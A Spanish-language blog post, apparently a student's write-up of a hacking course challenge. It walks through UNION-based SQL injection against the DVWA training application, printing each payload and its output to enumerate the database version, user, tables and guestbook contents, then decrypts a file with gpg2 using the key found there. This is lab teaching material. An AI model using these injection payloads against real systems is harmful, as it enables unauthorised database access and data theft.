Para conseguir la clave, debes acceder a http://pruebas.euskalert.net y demostrar las destrezas adquiridas en tareas anteriores. Yoda te da una pista importante:
Para resolver el enigma, seguiremos los pasos de la tarea 2 de la segunda unidad SQL Injection utilizando los mismos datos de usuario / contraseña y configurando el nivel de seguridad a bajo.
Primero obtendremos la versión de la base de datos, la sentencia a enviar es:
%' or 0=0 union select null, version() #
ID: %' or 0=0 union select null, version() # First name: admin Surname: admin ID: %' or 0=0 union select null, version() # First name: Gordon Surname: Brown ID: %' or 0=0 union select null, version() # First name: Hack Surname: Me ID: %' or 0=0 union select null, version() # First name: Pablo Surname: Picasso ID: %' or 0=0 union select null, version() # First name: Bob Surname: Smith ID: %' or 0=0 union select null, version() # First name: Surname: 5.5.44-0+deb8u1
La version de la base de datos mysql es: Surname: 5.5.44-0+deb8u1
El usuario de la base de datos que ejecuta el código php, cuya sentencia es: %' or 0=0 union select null, user() #
ID: %' or 0=0 union select null, user() # First name: admin Surname: admin ID: %' or 0=0 union select null, user() # First name: Gordon Surname: Brown ID: %' or 0=0 union select null, user() # First name: Hack Surname: Me ID: %' or 0=0 union select null, user() # First name: Pablo Surname: Picasso ID: %' or 0=0 union select null, user() # First name: Bob Surname: Smith ID: %' or 0=0 union select null, user() # First name: Surname: dvwa@localhost
El nombre de usuario que ejecuta el código php es: dvwa@localhost
El siguiente punto es obtener el nombre de la base de datos. %' or 0=0 union select null, database() #
ID: %' or 0=0 union select null, database() # First name: admin Surname: admin ID: %' or 0=0 union select null, database() # First name: Gordon Surname: Brown ID: %' or 0=0 union select null, database() # First name: Hack Surname: Me ID: %' or 0=0 union select null, database() # First name: Pablo Surname: Picasso ID: %' or 0=0 union select null, database() # First name: Bob Surname: Smith ID: %' or 0=0 union select null, database() # First name: Surname: dvwa
El nombre de la base de datos es: dvwa
Listar todas las tablas de la base de datos. %' and 1=0 union select null, table_name from information_schema.tables #
ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: CHARACTER_SETS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: COLLATIONS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: COLLATION_CHARACTER_SET_APPLICABILITY ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: COLUMNS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: COLUMN_PRIVILEGES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: ENGINES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: EVENTS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: FILES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: GLOBAL_STATUS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: GLOBAL_VARIABLES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: KEY_COLUMN_USAGE ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: PARAMETERS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: PARTITIONS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: PLUGINS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: PROCESSLIST ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: PROFILING ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: REFERENTIAL_CONSTRAINTS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: ROUTINES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: SCHEMATA ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: SCHEMA_PRIVILEGES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: SESSION_STATUS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: SESSION_VARIABLES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: STATISTICS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: TABLES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: TABLESPACES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: TABLE_CONSTRAINTS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: TABLE_PRIVILEGES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: TRIGGERS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: USER_PRIVILEGES ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: VIEWS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_BUFFER_PAGE ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_TRX ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_BUFFER_POOL_STATS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_LOCK_WAITS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_CMPMEM ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_CMP ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_LOCKS ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_CMPMEM_RESET ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_CMP_RESET ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: INNODB_BUFFER_PAGE_LRU ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: guestbook ID: %' and 1=0 union select null, table_name from information_schema.tables # First name: Surname: users
Tablas que contenga el prefijo user.
Setencia SQL %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
ID: Setencia SQL %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#First name: Surname: USER_PRIVILEGESID: Setencia SQL %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# First name: Surname: users
De la misma manera (enviando consultas SQL) obtendríamos información de la tablas que su contenido sea 'user', passwords, etc.
Pero si recordamos lo que decía el maestro Yoda, el nombre de la tabla es 'guestbook' que contenido albergará?
La sentencia SQL para listar las columnas de la tabla 'guestbook' es:
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'guestbook' #
ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'guestbook' # First name: Surname: guestbook comment_id ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'guestbook' # First name: Surname: guestbook comment ID: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'guestbook' # First name: Surname: guestbook name
Visualizar el contenido de la tabla guestbook.
%' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook #
ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook # First name: Surname: 1 This is a test comment. test ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook # First name: Surname: 2 These aren't the droids you'r looking for... Obi-Wan Kenobi ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook # First name: Surname: 3 The key is "use the force", Luke. Yoda ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook # First name: Surname: 4 Han Solo shot first! Anonymous bystander ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook # First name: Surname: 5 Master Kenobi, you disappoint me. Yoda holds you in such high steem. Surely you can do better! Count Dooku ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook # First name: Surname: 6 At last we will reveal ourselves to the Jedi. At last we will have revenge. Darth Maul ID: %' and 1=0 union select null, concat(comment_id,0x0a,comment,0x0a,name,0x0a) from guestbook # First name: Surname: 10 Its a trap! Admiral Ackbar
De toda la información de la tabla, algo curioso es [The key is "use the force", Luke. Yoda], tal vez la clave sea "use the force" para descifrar el enigma.
Para descifrar el fichero, procederemos tal y como se realizó en la tarea 3 de la unidad 1.
Sí todo ha ido bien, aparecera un mensaje similar a este.
sergio@tux:~$ gpg2 --decrypt Enigma.gpg > resultado_enigma.txt gpg: datos cifrados CAST5 gpg: cifrado con 1 frase contraseña gpg: ATENCIÓN: la intgridad del mensaje no está protegida sergio@tux:~$
En caso contrario, mostrara un mensaje de Llave de sesión no valida.
sergio@tux:~/ownCloud/mooc_hacking$ gpg2 --decrypt Enigma.gpg > resultado_enigma.txt gpg: datos cifrados CAST5 gpg: cifrado con 1 frase contraseña gpg: DBG: borrada frase de paso en caché con ID: SD406FC57F94A64FD gpg: descifrado fallido: Llave de sesión inválida sergio@tux:~$
El mensaje descifrado fue el siguiente:
¡Enhorabuena! Has resuelto el enigma... ya puedes solicitar audiencia con el Consejo Jedi: https://www.facebook.com/groups/consejojedimu/
0 comentarios:
Publicar un comentario